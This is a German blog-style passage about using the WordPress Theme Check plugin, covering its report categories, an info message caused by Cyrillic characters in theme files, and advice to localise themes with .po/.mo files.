Wenn Sie im Quellcode Ihrer Theme-Dateien Kyrillisch verwenden, müssen Sie darauf vorbereitet sein, im Bericht auf Informationen dieser Art zu stoßen:

INFO: In der Datei single.php wurden nicht druckbare Zeichen gefunden. Möglicherweise möchten Sie diese Datei auf Fehler überprüfen.

Sie können die Anzeige solcher Meldungen deaktivieren, indem Sie das Kontrollkästchen neben „INFO unterdrücken“ aktivieren. Hinweis für die Zukunft: Verwenden Sie bei der Lokalisierung eines Themes die speziellen Übersetzungsdateien ru_RU.po und ru_RU.mo, anstatt den Quellcode zu bearbeiten und englische Wörter durch russische zu ersetzen.

Theme-Check-Plugin wird für WordPress-Theme-Entwickler und Site-Administratoren nützlich sein. Der Bericht basiert auf der Überprüfung eines Standardsatzes von Mindestanforderungen im aktuellen Thema und enthält die folgenden Anmerkungen:

• Erforderlich – eine erforderliche Funktion, Klasse oder Beschreibung fehlt;
• Warnung – Warnungen, beispielsweise vor dem Vorhandensein versteckter Dateien;
• Empfohlen – Empfehlungen zur möglichen Nutzung neuer Funktionen;
• Info – andere Informationsmeldungen.

Die meisten der ausstehenden Anforderungen werden durch Verweise auf den Kodex gestützt, der Funktionen und Parameter beschreibt. Allerdings ist der Bericht bereits recht aufschlussreich. Ein kleiner Ausschnitt:

Die Testergebnisse sind mit einer gewissen Vorsicht zu genießen. Sie sollten nicht unbedingt alle vom Plugin empfohlenen Funktionen nutzen – darunter wird es wahrscheinlich einige geben, die Sie wirklich nicht nutzen möchten.

Mithilfe des Debug-Modus und des Theme-Check-Plugins konnte ich eine Reihe von Problemen identifizieren, die durch veraltete Funktionen verursacht wurden. Einige Verbesserungen in „functions.php“ wurden als unnötig entfernt oder durch Standardlösungen ersetzt, die in den neuesten Versionen enthalten waren. Ich empfehle, einen Blick auf Ihre Blogs zu werfen!